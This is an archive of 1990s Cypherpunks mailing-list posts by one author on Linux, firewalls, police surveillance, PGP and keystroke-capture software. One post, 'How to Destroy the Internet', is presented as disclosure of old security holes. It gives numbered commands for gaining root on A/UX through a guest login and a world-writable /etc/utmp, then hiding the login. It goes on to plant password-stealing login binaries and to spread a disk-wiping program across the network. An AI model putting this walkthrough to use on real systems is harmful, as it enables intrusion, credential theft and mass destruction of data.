
@_date: 1994-12-03 01:04:57
@_author: Michael D. Crawford 
@_subject: Info about Linux 
Joe Block, jpb at gate.net, sez:
I've got Linux.  Linux comes in different "distributions" - collections of
files that have been integrated into a coherent system.  My distribution is
sold by Yggdrasil, (408) 261-6630, (800) 261-6630, for $39.95.  I like it
because it comes with a single boot floppy, and will run off the CDROM once
it boots, so you can check it out without even having a hard disk
If you've got time, patience, a good, fast net connection and a whole lotta
floppies, the slackware distribution (and a couple of others) are available
via anonymous FTP from sunsite.unc.edu.  There are also several other
distributions available on CDROM from various vendors.  Check the ads in
the Linux Journal (subs at ssc.com for subscription info, (206) 527-3385, or
at one of the bookstores I mention further down).
If you know about computers, and are willing to put some time into mucking
around fixing little petty problems, you can get a very nice system.  Mine
is a 33 MHz 386 (this is a little too slow for me, but works well), with
8MB of memory (sufficient, should have more), and a nice fast 2.1 GB Fast
SCSI-2 Quantum Empire 2100S hard disk.
I invested in the hard disk as I felt it would be a lasting value in future
computers.  I'm skimping on ISA bus cards for the PC as I want to get a PCI
bus machine, probably a 100MHz 486, in a few months.
You will be able to install Linux, the compiler, basic utilities, and the
kernel sources with the disk space you have.  You'll want to get more hard
disk.  I would recommend installing Linux a couple of times, just to see
how it goes, before committing to a permanent installation.  If you can't
get more disk space, you can leave the Yggdrasil CDROM in your drive all
the time and run the programs off the CDROM.  Slower, but it works OK.
I highly recommend the Linux Bible, from Yggdrasil, whatever distribution
you get.  Read the "How To's" on the various hardware options _before_
purchasing any new hardware.  There are many supported peripherals, but I
understand many of them work only marginally.  For example, the UART chips
generally used in PC serial ports are quite inadequate for driving an
internet connection, as your machine will spend all its time servicing
one-interrupt-per-character interrupts, but a serial card with a 16
character buffer that works just fine is available quite cheaply.
You can FTP the bible from ftp.yggdrasil.com, but you'll want the hardcopy
as it is over 1000 pages.  The cover price is less than the cost of the
toner cartridge you'll burn printing it.  The How To's, the Linux MetaFAQ
and lots of other info are on rtfm.mit.edu and sunsite.unc.edu.
I've used lots of Unix systems, from System V on a 286, to Sun
workstations, Vaxes, and even a Cray running Unicos, and I can say that
Linux is equal to or better than any of them as far as what the OS can do,
in some respects much much better.  (I removed SCO ODT from my hard disk to
install Linux.  I might reinstall it on a second drive just to test my
programs).  There are still lots of glitches, but you have the source code,
and access to comp.os.linux.help, where everyone else has the source code
too - it beats the Hell out of Sun's technical support, IMHO.  With about
two thousand dollars more hardware, I would have a machine I would enjoy as
much as a fifteen thousand dollar Sun, with the source code to boot ;-).
One thing I highly recommend: if you or anyone you know is planning on
setting up a full-time Internet connection, use a Linux box as a router,
running PPP or SLIP out a modem, and ethernet on your LAN.  Even a slow 386
has enough performance to service a SLIP connection at 28 kbaud, and since
you have the source code to the kernel and all the internet server
software, you can implement a firewall any way you like.
I'm contemplating preparing my own distribution, which would be a very
stripped-down Linux kernel and OS utility set, on a small number of
bootable CDROMs, to allow one to install a firewall router on a small hard
disk.  Don't hold your breath waiting for this though.
There is a security enhancement I mean to try once I've set up my own
full-time router (watch for  in about two
weeks, maybe a month).  I want to remove the ability to set the setuid bit
from the kernel.  Trying to set the setuid bit on a file will abort the
process.  Of course you can't install system software if this is done - but
I could boot off a different kernel to do maintenance.  This would prevent
the problem of a hacker breaking in and dropping a program in my path that
the hacker intends me to accidentally execute as root.  There would be ways
to set the bit (writing into the raw disk special file) but it would
require more effort to accomplish.
Crypto enthusiasts in the US and Canada can get Matt Blaze's CFS - I just
got the sources, and haven't tried them out yet, but I understand there is
already a Linux port.
Now here's a puzzler for you.  The People's Republic of China is working
very hard to modernize, but still lacks capital for much hardware
investment, so you see banks using 386 boxes to run an entire bank, if the
bank uses a computer at all.  A couple of years ago I heard that the PRC
signed a deal with some big Unix vendor to supply the nation with computers
and software, for many millions of dollars.  Why don't they use Linux?  The
PRC is certainly not lacking for educated people who could do all the
development they need.
You can get Linux books and CDROM's from the Computer Literacy bookstore on
North First Street in San Jose, and Powell's technical books in Portland
Oregon.  Powell's does mail order, and has a Web page which allows you to
search their inventory for books.  They've got lots of crypto books too,
2600 Magazine and lots of engineering books.  I think the URL is
Development versions of Linux are available for Macintoshes and MIPS
machines.  If I were to use a Linux Laptop, I would put it on a Macintosh
Michael D. Crawford
crawford at scruznet.com     <- Please note change of address.
crawford at maxwell.ucsc.edu <- Finger me here for PGP Public Key.

@_date: 1994-12-04 23:41:17
@_author: Michael D. Crawford 
@_subject: Info about Linux 
Matt Bartley  writes
I don't want to recommend a particular card until I've tried one myself.
I'm using the old fashioned one-character-buffer card.  I will ask a friend
who has had some success.
Selection doesn't work at all unless you have the 1.1.something kernel or
later.  The 1.0 kernel that ships with Yggdrasil doesn't support selection.
The "even" numbered kernels are regarded as stable release for regular
people to use.  The "odd" releases, 1.1.x, are development versions that
are not expected to be stable, which is why it's not what you get on
Yggdrasil.  Release 1.2 is coming Real Soon Now.  You can get the
development kernels, and I think the Y. CD has a tar file with a fairly
recent 1.1.x kernel.
I also recommend using a bus mouse.  I'm using the Logitech bus mouse; I
previously had used a Microsoft serial mouse.  I get a lot better
performance from the bus mouse - my cursor moves when I move the mouse,
with much greater reliability than the serial mouse did.
(I mentioned using Linux for a firewall router)
It might be possible to make a router work on a LAN with dynamic addresses,
but I doubt it.  Much better would be to either apply to InterNIC for a
class C network number, or ask your service provider to assign you a whole
subnet of addresses for yourself (if they only do dynamic addressing, they
probably won't want to do this.  They may be reluctant in yielding up any
of their address space in any case.)
A router connects two different cables, which may be of the same or
different physical media, so that IP packets can hop from one cable to
another.  The router also knows how to direct packets that are meant for
distant destinations: it passes them on to the next router.  One might
connect two ethernets with a router, or an ethernet and a SLIP/PPP modem
Routers are also often referred to as gateways, but I prefer the more
precise meaning, in which a gateway is a machine that connects two
incompatible networking protocols, by translating the higher level
services.  For example, there are Internet SMTP to UUCP mail gateways in
every Unix box, as well as the Internet/CompuServe and Internet/AOL
gateways.  There are other kinds, such as the network file service gateways
to allow Macintoshes to do AppleShare mounts from an NFS server - the
FastPath and Gator boxes do an NFS mount from the fileserver, then act as
appleshare servers.  When a Mac reads a file using AppleShare, the gateway
reads the file using NFS and passes along the results.
A firewall is a single point of connection between a "protected" and a
"public" network.  It is usually combined with a router.  It uses such
things as filtering packets based on protocol, port number, source and
destination addresses to try to keep hackers out of a network.  Services
which are desired to run through the firewall, but which are risky, are
handled by proxy servers on the firewall, so in this sense it is a gateway.
There is a very good book out on this topic, from the folks who maintain
AT&T's firewall, entitled Firewalls and Internet Security, by William R.
Cheswick and Steven M. Bellovin, ISBN 0-201-63357-4.  I recommend it to
anyone who runs a machine on the Internet - and to anyone who wishes to
penetrate one: it has a pretty detailed guide on how to hack machines.
(The authors recommend subscribing to 2600 magazine!)
You don't need to have a firewall to tighten up the security on your
machine.  Read this book if you're going to put a Unix box of any sort on
the Internet, or you might wake up some day to find someone's erased your
hard disk from the other side of the globe.
To be complete, I should also mention bridges.  A bridge is a sort of
primitive router, that connects two or more LAN sections.  The sections
have the same physical media.  This is done for fault isolation, to extend
the maximum cable length, to allow star topology on bus nets like ethernet,
and to reduce traffic on the whole net somewhat (the bridges don't pass
packets that are destined for the same cable segment that they originated
on, but they do pass broadcast packets).  Bridges used in organizations
that require multiple protocols on the same net (eg., AppleTalk and IP).
Twisted Pair Ethernet Hubs are a sort of bridge.
There is a serious problem with bridges, in that they make the entire
network appear to be on the same segment of cable to higher-level
protocols, so an IP broadcast will stimulate every machine on the campus
net.  When I was at CERN, working on the NA47 experiment, I would do
"ruptime | grep na47" to find what workstations were lightly loaded in my
building.  This resulted in the central network police bearing down on my
experiments sysadmin, as my broadcasts were asking every machine in the lab
- thousands! - what their load was, and they were all responding
simultaneously.  (In such a case it is a much better idea to use
multiprotocol routers - I can't fathom why CERN doesn't do this.)
I will, of course.
Another idea is to foil dictionary attack on my passwd file by varying the
encryption algorithm somewhat.  It won't necessarily be a more secure
algorithm, but to hack my password file you'd have to run a dictionary
attack just for my machine.
I'm not so convinced that the Cypherpunks list wants to hear all this, but
it's probably of interest to you that Linux is the cheapest way to get
complete Unix/X11 development tools on a machine that you can be root on.
Most of you can't edit the password file, tinker on the kernel, or reboot
your campus Unix machines, but if you have at least a 386 you can do all
this.  If you wanted to make, say, a hardware encryption card for Unix,
you'd be best off using Linux so you'll have the full kernel sources to
ease writing your device driver.
Michael D. Crawford
crawford at scruznet.com     <- Please note change of address.
crawford at maxwell.ucsc.edu <- Finger me here for PGP Public Key.

@_date: 1994-12-08 16:25:01
@_author: Michael D. Crawford 
@_subject: How to Destroy the Internet (was Info about Linux) 
I write:
Before I proceed, let me point out that the following procedure has been
documented for more than five years.  Some may regards it as irresponsible
to publish this information, but I consider it a greater danger that many
Unix machine owners fail to appreciate the seriousness of this problem.
How to erase the hard disk of almost every Unix machine on the Internet:
Apple's A/UX 2.0 was, at least initially, shipped with two well-known
security holes, holes which had been documented for years in the CERT
advisories.  When I was the MacTCP test engineer at Apple, I beta tested
A/UX, found these holes, and tried very hard to get Apple to close them
before shipping the product, which was primarily meant as Apple's candidate
for an $80 million Air Force contract.  I found this pretty ironic, but
when I griped about it at Apple - and I griped about it increasingly loudly
as the ship date approached - all I got was sternly scolded.
Apple's internal netadmins did invite to play "capture /flag" on their
internal net Unix machines, which was fun.  I never could break into /flag.
Security hole  A/UX ships with the guest login enabled, with no
password.  Thus anyone can log in to any A/UX machine on the Internet.
Security hole  A/UX was largely derived from SunOS, and shared a hole
with older versions of SunOS.  The /etc/utmp file is world writable.  The
reason this is done is so that shell windows in the MacOS process on A/UX,
or under SunView on the Sun, can appear to be logged in terminals, I think
mainly to allow "wall" to write messages to all the windows.
This is a deadly error.  If /etc/utmp is world writable, anyone who can log
in, with a little practice, can become root and cover evidence of their
login in about 30 seconds.
This is done as follows:
0. Using HINFO records from the name service, and looking at the SMTP,
   FTP, and login banners of many machines on the Internet, collect the
   addresses of many A/UX machines.  For each A/UX machine do 1 - 15:
1. On your local machine, running the window system of your choice, type
    in a no-password passwd file entry for root into a window.  Leave the
    window open.
2. On your local machine, create a file in utmp format in which ../tmp/foo
   is the only logged in terminal.  Copy it to the clipboard (this will be
   a binary file - you have to write a small C program to create it).
3. Log in as guest over the internet.
4. cat /etc/utmp | od -h
5  cp /etc/passwd /tmp/Ex12345
6. cat > /etc/utmp
7. Paste the contents of your clipboard into the terminal window and press
   control-D.  Now you've made /dev/../tmp/foo the only terminal which
   appears to be logged in.
8. ln -s /etc/passwd /tmp/foo
9. rwall "root::0:0::/:/bin/sh".  This message is broadcast to all logged
   in terminals, thus replacing the password file with your own.
10. su ... now you are root.  Time to cover your tracks!
11. mv /tmp/Ex12345 /etc/passwd
12. Copy the hex dump that just scrolled by on your screen to the
    clipboard.  Paste it into a program that you have written that
    converts it back into binary, removes all the guest login records
    from it, and places the result back on the clipboard.
13. cat > /etc/utmp ... paste into the terminal window and press ^D.
14. Relax.  Take a break and look upon your handiwork.  The only
    evidence of your connection is the existence of a couple of shell
    processes and a telnet or rlogin daemon.  "who" or "users" will not
    show you; the machine's users will have to examine ps listings very
    carefully to see that you are logged in.
15. When you've sufficiently regained your composure, use ftp to fetch
    patched telnet and rlogin binaries from your machine.  With telnet
    you could just set the debug flag to dribble all the user's keystrokes
    into a file, but it would have more finesse to send a UDP packet of
    the first few keystrokes of each session to a server you have somewhere
    on the internet.
16. Collect passwords to every machine that allows logins from the machine
    you have just hacked.  If you get any root passwords, go to step 15.
    (be sure to collect enough keystrokes to catch any su's that are done
    after logging in as a regular use.  If the passwords are to any other
    A/UX machines, or old SunOS machines, go to step 4.
17. After you have collected lots of root passwords, right a C program
    that will wait for a certain delay, then turn off all networking
    using ifconfig (to prevent the admin from getting in and stopping
    the damage), mmap the raw partitions of all the mounted hard disks,
    make sure that the whole program is sitting in physical ram, then
    write garbage into the mmap'ed memory blocks.  Install this program
    on all your target machines, with the delay synchronized to each
    system's own clock so that the damage happens simultaneously worldwide.
You will probably want to distribute installation programs to a few dozen
of your hacked machines, and have them all install on the machines nearby,
to prevent word from getting out before the installations are all complete.
If you're lucky, you can get the passwords to some backbone routers and
partition the internet to help prevent the spread of the warning.
The reason your college's machines have not been hacked yet, is because
there are many machines on the internet, and the hackers have not got
around to it yet.
Read Firewalls and Internet Security, by William R. Cheswick and Steven M.
Bellovin, ISBN 0-201-63357-4, before this happens to you.  Any machine that
allows logins from your own machine will be compromised, if your machine is
compromised.  Every machine that allows logins from any machine that allows
logins from you will then be compromised, and so on.  If the security is
not tightened up considerably on the hosts connected to the Internet,
someone's going to do something like this and bring the whole thing down.
The Morris Worm did a great deal of damage to the net, but did little in
the way of monetary damage beyond wasted employee time.  Something like
this would do damage in the billions of dollars.
Michael D. Crawford
crawford at scruznet.com     <- Please note change of address.
crawford at maxwell.ucsc.edu <- Finger me here for PGP Public Key.
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6
-----END PGP PUBLIC KEY BLOCK-----
Michael D. Crawford
crawford at scruznet.com     <- Please note change of address.
crawford at maxwell.ucsc.edu <- Finger me here for PGP Public Key.

@_date: 1994-12-11 13:44:38
@_author: Michael D. Crawford 
@_subject: Real-time surveillance of the police 
In the December '94 issue of Wired, ("Watching the Detectives", p. 141),
Sandy Sanfort describes Bob Fleming's work to make real-time permanent
recordings of the body positions of police officers.
One could place a small sensor on each wrist and ankle, and record the
positions (and velocities) of the cops body to with a _centimeter_,
anywhere in a city.
The advantage for cops is that a fallen officer can be quickly located, and
a cop's claim to have witnessed an event can be corroborated by
demonstrating that he was actually there.
The advantage for society is that the cop's behaviour, such as billy-club
swinging velocity, can be monitored. It could detectgunfire, too, by
measuring the kick that is transmitted down the cop's wrist. This would
work to the extent that the equipment is actually mounted on the cop it
claims to belong to, so some manner of authentication would be needed.
Also discussed is the idea of car or helmet mounted cameras, transmitting
images continuously, to be stored by a neutral third-party, in the event of
a legal challenge, either from the accused claiming that the cop is lying,
or of claims of police brutality.
After the Rodney King incident, I had the notion, (which I did not act on
to actually promote, I'm sorry to say), that organizations representing
people that feel persecuted by the law could issue disposable cameras to
all there members. For example, if a street gang felt the cops were
thumping their members with unwarranted enthusiasm, the gang could purchase
a case of cameras at the local Price Club, and everyone could carry them to
photograph the cops. In addition, cameras could be unobtrusively mounted on
car hoods, perhaps with three or four such cameras multiplexing their
images onto a single videotape (one wants a wide, but not necessarily tall
aspect ratio; three such cameras with fisheye lenses could cover the hole
perimer of a car). The VCR would be in a fireproof safe welded to the car
frame (or use a surplus flight recorder package), so it would take extra
effort for a cop to conceal the evidence of wrongdoing after mistreating
the driver. It would also be handy for assigning responsibility in traffic
Yes, that's right - keep surveillance cameras going on _yourself_. If
you're not doing anything illegal, you've got nothing to fear from taping
everything you do.
Of course, after the difficulty the City of Santa Cruz had in establishing
a Police Review commission, and considering that its powers were
eviscerated in light of a lawsuit threat by a police union, I expect that
it will be difficult to convince our Nation's Finest to adopt this new
technology - though I'm sure they'd be happy to apply it to parolees and
those serving on probation. Adoption could be initially achieved, though,
by pointing out to private security firms that their liability could be
reduced by monitoring their employees - obvious slackers could be
immediately fired, troublesome guards could be disciplined, and the firm
could demonstrate in court that the guard was nowhere near the scene when
the plaintiff claimed to have been beaten by a guard. Private security
guards have nowhere near the influence that police unions do, and so would
have little power in arguing against it. Later on, cities faced with
expensive lawsuits could strike a deal with the liability insurance
companies to save money if the city cops use this stuff.
After the DT fiasco, and the mention yesterday of the DOJ's new Big Brother
Database, I thought you'd like to hear that someone's working on giving Big
Bro the stick too. I personally feel that a society that _needed_ to do
this to its cops is an abhorrent society. But perhaps we could strike a
deal with Big Bro - if you don't tap our phones, we won't pass laws to tap
your cops.
Best Wishes in this Holiday Season,
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6
-----END PGP PUBLIC KEY BLOCK-----
Michael D. Crawford
crawford at scruznet.com     <- Please note change of address.
crawford at maxwell.ucsc.edu <- Finger me here for PGP Public Key.

@_date: 1994-12-12 00:05:40
@_author: Michael D. Crawford 
@_subject: Real-time surveillance of the police 
Works for me, too, and one would think that it would work for cities, but
experience shows that individual cops can rack up millions of dollars in
legal settlement costs and still remain on the force.  I heard some figure
- this is quite vague, but hey, it's midnight - that a small handfull of
cops in San Francisco had cost the City tens of millions, with individual
cops repeatedly causing lawsuits, without getting fired.
Why?  Police unions.  Settling out of court without assigning blame.  City
politics.  Mayors that are former police chiefs.  A clueless populace.
Promises to do better next time.
Now, I heartily agree with you that the police should be more closely
monitored, and certainly cities have ample reason to avail themselves of
this, but most cities do not even avail themselves of citizen police review
commissions, because of the resistance the police have to it.  In Santa
Cruz, a proposal to allow an independent citizen panel to review police
internal affairs investigations faced threats of lawsuits from the police
union, and took _years_ to adopt.  The commission we got has considerably
less authority than was originally proposed.  This is in a city reknowned
throughout the nation for its leftist politics.  If the People's Republic
of Santa Cruz couldn't get a review board with real authority implemented,
I doubt you'll convince the LAPD to put radio beacons on their thumping
Much as I think they should.
Sandy continues:
Well, my knowledge is that at least one cop wouldn't go for it - the cop we
caught jacking off to a magazine of ill repute, parked in his patrol car on
Yerba Buena Island in San Francisco Bay.  Those rhythmic wrist-movements
would show an unmistakable frequency signature back at home base.
He sure drove off quick.  Didn't even say hello.
I say,
tcmay at netcom.com (Timothy C. May) replies:
I reflected on this a bit, and decided that if one were to implement
"personal surveillance", a decent solution would be to encrypt the tapes.
Use DAT tape instead of a VCR, and save MPEG's or QuickTime movies that
have been encrypted with IDEA.
The idea here is protection _from_ the police, to demonstrate that an
officer misbehaved in the vicinity of my car, rather than to provide a
record for use by the government.  Needless to say, I wouldn't advertise
that I actually had such a thing until I pulled the tapes out in a
deposition, or sent them, decrypted, to the TV news.  Again, I'm not saying
such surveillance should be imposed, supplied or encouraged by the
authorities, but that one might find some benefit in installing it oneself.
Michael D. Crawford
crawford at scruznet.com     <- Please note change of address.
crawford at maxwell.ucsc.edu <- Finger me here for PGP Public Key.

@_date: 1994-12-26 19:28:41
@_author: Michael D. Crawford 
@_subject: PGP at MacWorld Expo? 
The MacWorld Expo is coming up soon in San Francisco, I believe from the
4th through the 7th of January.
There must be _someone_ on this list who works for a company or user group
that will be exhibiting (I know for sure the Berkeley Macintosh User's
Group always exhibits, as does the Boston Computer Society).
Do the world a favor.  Distribute PGP from your booth.  This being the
MacWorld Expo, you'll need mostly Mac disks, but you would want to have
some Unix and DOS disks on hand as well.  Have flyers about the
Digital Telephony Bill, to clue in the legislatively impaired.
Imagine what a crowd you'll draw to your booth with a sign reading
"Unbreakable encryption software - just $3 a disk".  You might even make
headlines in the trade rags or the SF newspapers.
Certainly BMUG and BCS already have the "infrastructure" to sell freeware
disks.  But any of your companies out there would do well to sell freeware
disks too.
I understand, from my own experience of working at MacWorld (no, I won't be
exhibiting...), that one of the biggest objections to this will be simply
dealing with getting the disks duped and labeled, getting them to the show
floor, and dealing with the large number of people who will be purchasing
the disks and needing you to make change.  This could be no small amount of
impact on your booth operations.  Another option is to offer PGP free with
any purchase of your regular product, or to just distribute flyers about
the DT bill with instructions for obtaining PGP from the Internet and
online services.
Michael D. Crawford
crawford at scruznet.com     <- Please note change of address.
crawford at maxwell.ucsc.edu <- Finger me here for PGP Public Key.

@_date: 1994-12-30 01:41:19
@_author: Michael D. Crawford 
@_subject: My "netcard" 
I thought y'all would be tickled by the "e-card" I made up in preparation
for the MacWorld Expo.
I made a bunch of cards from Avery 5371 Laser Business Cards (about twelve
bucks for 250 cards, at most office supply stores).
On the front is a nifty logo, my name, and my e-mail address.  No phone or
snail address.  (I have a regular card for that, or I can write my number
on the e-card if I want the recipient to have it).
On the back is a headline "PGP Public Key Encryption Key", followed by
these instructions:
"Enter the key block exactly as shown.  Check carefully to ensure that it
is correct.  Then remove the spaces between the 8 character groups and add
to your public keyring."  (Suggestions for wording?  I don't have much
Following is my ASCII-armored public key, in courier font so it is
fixed-width and everything lines up nicely.  I added a space after every
eighth character.  Maybe I should use a narrower space and put it after
every fourth.  To save space (and user typing) I copied my key into a new
keyring and removed all the signatures from it before extracting it as
ASCII.  It is also in a just-readable 5-point size.
Finally, it says "For a fully-signed key, finger crawford at maxwell.ucsc.edu".
One might ask, "if they can finger, why give the key?"  The recipient might
not be on the Internet.  I don't think you can finger from AOL, and I'm
sure you can't from UUCP, AppleLink or CompuServe.  In any case, it will be
more convenient for the people I meet at the show to enter my key on their
laptops back at the hotel, without having to cruise the net looking for my
I dig it.  It needs some sprucing up on the graphic design, but it seems
like it will be useful.
Michael D. Crawford
crawford at scruznet.com     <- Please note change of address.
crawford at maxwell.ucsc.edu <- Finger me here for PGP Public Key.

@_date: 1994-12-31 18:34:27
@_author: Michael D. Crawford 
@_subject: From Me to You for the Coming Year....*giggle* 
Carol Anne Braddock  sez...
... etc.
An interesting form of steganography.  Is there a prize for determining the
secret message?
And Happy New Year to you, too!
Michael D. Crawford
crawford at scruznet.com     <- Please note change of address.
crawford at maxwell.ucsc.edu <- Finger me here for PGP Public Key.

@_date: 1994-11-19 18:59:30
@_author: Michael D. Crawford 
@_subject: usenet-to-mail 
tim werner  asks:
page 255:
cc.usu.edu (read only)
etl.go.jp (read/post)
europa.eng.gtefsd.com (read only)
fconvx.ncifcrf.gov (read only)
gaia.ucs.orst.edu (read only)
hermes.chpc.utexas.edu (read only)
newshub.nosc.mil (!)  (read only)
There are many others, but this should get you started.  Are these in a FAQ
(My first post to CypherPunks, BTW.  Greetings.)
Michael D. Crawford
crawford at scruznet.com
crawford at maxwell.ucsc.edu <- Finger me here for PGP Public Key

@_date: 1994-11-30 10:34:03
@_author: Michael D. Crawford 
@_subject: PGP hook for Eudora? 
The commercial Eudora (2.0 or later) supports the Word Services Apple
Events Suite.  This allows text services such as spellchecking or
encryption to be placed in the menu bar, without use of AppleScript.
There is not yet a Word Services aware encryption program, though, but its
not too hard to write one, starting from the existing MacPGP or pgptools
The Word Services Software Development Kit should be on
mac.archive.umich.edu.  I'm going to put out an updated one for anonymous
FTP pretty soon.  The SDK only has example code for the client side (a
simple, teachtext-like word processor), but between that and the protocol
specification it should not be too hard to figure out.
I developed the Word Services suite (with lots of help), and prepared the
SDK, as well as implementing Word Services in Working Software's Spellswell
7 spellchecker.
Michael D. Crawford
crawford at scruznet.com     <- Please note change of address.
crawford at maxwell.ucsc.edu <- Finger me here for PGP Public Key.

@_date: 1995-01-02 15:37:03
@_author: Michael D. Crawford 
@_subject: Comments on Key Capture Survey 
I am the author of the Last Resort keystroke capture program for the
Macintosh, published by Working Software, Inc..  I am writing up the
surveys for LR for Mac, DOS and Windows and will send them shortly.  I have
a couple of comments, which the list might be interested in hearing.
Your entries for the Macintosh should record the file type and creator
code, which are, for Last Resort, 'cdev' and 'mIKE' respectively (case is
significant).  If someone were to write an automated scanner meant to
protect a disk against such utilities, it would be much more reliable if it
looked for the creator codes, as Mac programs are usually written to not
depend on having a particular file name.  These codes live in the file
system, but are not part of the name space as '.EXE' would be on DOS.  You
can view them with ResEdit's "Get File/Folder Info" item from the File
We spent a lot of time pondering the problem of password theft.  We decided
that the benefit to the consumer of having this utility available to save
data outweighed the obvious danger of password and text theft.  The problem
increases, though, if one is not aware that Last Resort is installed.  The
Read Me file on the distribution disks has a discussion of this problem (as
well as the problem of people snarfing your files when you share your disk
to the whole company or campus), and there is a way to disable key capture
temporarily, for password entry.
I'm not real happy with the ease one can sneak Last Resort onto someone's
machine, but I take a little ironic solace in knowing that similar programs
that are "more hidden" than LR are available in source code form from
Phrack, at least for DOS.
On the plus side, I have gotten many, many letters, e-mails and phone calls
from people who say it saved their butts when a piece of critical
information would have been lost.  I had the habit of taking customer
orders over the phone while in the middle of debugging a program (like Last
Resort!) and would frequently crash before the order could be saved or
printed.  LR saved my company real money in this case.
David Pogue's book _Hard Drive_ is based in part on Last Resort, in that a
key capture utility is used to recover a password that saves the world.  I
was quite tickled by this.
I'm sad to say, though, that I know of one case in which Last Resort
precipitated the end of a relationship, in which a fellow discovered the
love letters his girlfriend had e-mailed to someone else in his Last Resort
files.  This particular fellow was glad that he found out about it, but I
still feel a twinge of guilt when I think about it.
I certainly support any effort made to document the existence of these
programs.  I might suggest that one way to defend against them would be to
watch for the patching of certain system calls - patching GetNextEvent or
installing a jGNEFilter on the Mac, and warning the user if this happens.
It's easy to detect such patching; for the most part it will be innocent,
but a hacker who had a fair amount of Mac programming knowledge could make
a keystroke capture program in an evening of work, so attempting to catalog
them all will provide only moderate protection against them.
BTW... most of those other commercial keystroke capture programs (no names
here) are clones of Last Resort.  Some of them even had the gall to use our
logo in their advertising (in a claim they were better than us).  LR might
not do as much as some of them, but I know that it is more reliable than
the competitors I have tested.  So if you are going to actually _use_ a key
capture program for your own (legitimate!) use, consider getting The Real
Thing, the One True Key Capture Program, the Saviour of Data: Last Resort.
I don't work for WSI any more, but we remain friends, and they can be
reached at:
Working Software, Inc.
PO Box 1844
Santa Cruz, CA 95061-1844
(408) 423-5696
(800) 229-9675
(408) 423-5699 FAX
working at scruznet.com
76004.2072 at compuserve.com
Michael D. Crawford
crawford at scruznet.com     <- Please note change of address.
crawford at maxwell.ucsc.edu <- Finger me here for PGP Public Key.

@_date: 1995-01-22 20:52:00
@_author: Michael D. Crawford 
@_subject: $8M for National ID registry 
"Anti-immigration bandwagon," San Francisco Examiner, Sunday, 11/22/95, p. A-5:
Amid an article discussing Clinton's effort to beat the Republican's in
keeping out illegal aliens:
"A federal advisory commision recently proposed that the government
establish a computerized register of the names and Social Security numbers
of citizens and aliens authorized to work in the United States, so that
employers could check the immigration status of job applicants."
"Clinton will seek $8.3 million for a pilot program to evaluate the
effectiveness of such a system."
Comforting words, especially given that children are to be assigned Social
Security numbers at birth.
Best Wishes,
Michael D. Crawford
crawford at scruznet.com
crawford at maxwell.ucsc.edu <- Finger me here for PGP Public Key.

@_date: 1995-01-28 12:58:29
@_author: Michael D. Crawford 
@_subject: NYT on Target Shimomura 
John Markoff  quotes the NYT quoting Tsutomu Shimomura:
Yeah, that's the Tsutomu I know.  We were classmates at CalTech back in the
early 80's.  Tsutomu has never been known to mince his words.
I'm completely dumbfounded that someone found a way to break into the
computer in Tsutomu's home.  _Firewalls and Internet Security_ mentioned
that he participated in tracking down the Berferd hacker that attacked Los
Alamos, Stanford and AT&T.  Perhaps this latest hacker is related, or was
inspired to try because Tsutomu was mentioned in the book.
When Tsutomu left CalTech after his sophomore year, it was to go to Los
Alamos to do research on using dedicated hardware for fluid dynamics
calculations.  His group made some headlines back then for designing a new
parallel processing machine that Tsutomu described as costing about as much
as a Cray, but performing about 1000 times as fast as a Cray for performing
the single, very widely used function of calculating turbulent fluid flow -
for anything from predicting the weather to designing fighter planes.
(He and I were physics majors, not computer science).
He later went to UC San Diego, where I understood he was doing some manner
of research in theoretical physics.  I've not heard much from him for a
while, though I went to visit him a few years ago, and got to play around
on the computer that got broken into (if it's the same one still around).
Funny thought - Tsutomu just logged me in and went off to sleep, leaving me
to do as I pleased.  I mostly played around with Sun's NeWS software.
Funny that someone else should cause nationwide headlines through coming in
Tsutomu is one smart dude.  I consider him among the most intelligent
people I've ever met - and I've met some smart people, working in the
physics community and the computer business.
It happens that I got better grades, overall, than he did at CalTech - but
this is because he spent much of his time off doing research rather than
concentrating on mundane things like sophomore mathematics.  When he did
leave, Lawrence Livermore, Cray and Los Alamos were competing for his
attention.  When I left not too long after, I was unable to get a job at
Taco Bell.  (I'm doing much better now, being well established as a Mac
programmer, and thinking of getting into Linux kernel hacking &
Michael D. Crawford
crawford at scruznet.com
crawford at maxwell.ucsc.edu <- Finger me here for PGP Public Key.
